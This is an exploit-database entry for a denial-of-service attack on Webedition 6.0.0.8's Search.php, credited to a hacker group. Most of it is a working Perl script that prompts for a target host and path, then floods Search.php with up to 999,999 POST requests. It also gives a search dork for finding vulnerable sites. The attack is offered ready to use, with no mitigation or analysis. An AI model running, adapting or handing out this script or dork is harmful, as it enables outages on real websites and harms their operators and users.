Webedition 6.0.0.8 (Search.php) Denial of Service

2010-08-18T00:00:00
ID 1337DAY-ID-13734
Type zdt
Reporter H4k3r
Modified 2010-08-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================================
Webedition 6.0.0.8 (Search.php) Denial of Service Vulnerability
===============================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : H4k3r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : [email protected]


Product: Webedition
Version: 6.0.0.8.
Dork : "Powered by Webedition 6.0.0.8."

Exploit:

##########Start of P0C###########
#!/usr/bin/perl

use IO::Socket;

print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";
print "+       WebEdition V6.0.0.8 D.O.S Exploit       +\n";
print "+               (C)oded by H4k3r                +\n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n";
print "Host |without http://www.| ";
chomp($host = <STDIN>);
print "Path |example. /en or / | ";
chomp($pth = <STDIN>);
	{
	while($x != 999999)
		{
		$postit = "?we_lv_search_content_search=H4k3r+Pwnz0rz+From+Inj3ct0r+Team&we_from_search_content_search=1";
		$lrg = length $postit;
		my $sock = new IO::Socket::INET (
									PeerAddr => "$host",
									PeerPort => "80",
									Proto => "tcp",
									);
		die "\nOffline! - We can not Connect To '$host' it May be DoSed\n" unless $sock;
	
		print $sock "POST $pth/Search.php HTTP/1.1\n";
		print $sock "Host: $host\n";
		print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
		print $sock "Referer: $host\n";
		print $sock "Accept-Language: en-us\n";
		print $sock "Content-Type: application/x-www-form-urlencoded\n";
		print $sock "Accept-Encoding: gzip, deflate\n";
		print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
		print $sock "Connection: Keep-Alive\n";
		print $sock "Cache-Control: no-cache\n";
		print $sock "Content-Length: $lrg\n\n";
		print $sock "$postit\n";
		close($sock);
		syswrite STDOUT, "Online! ";
		$x++;
		}
	}
###########End of P0C###########



#  0day.today [2018-01-09]  #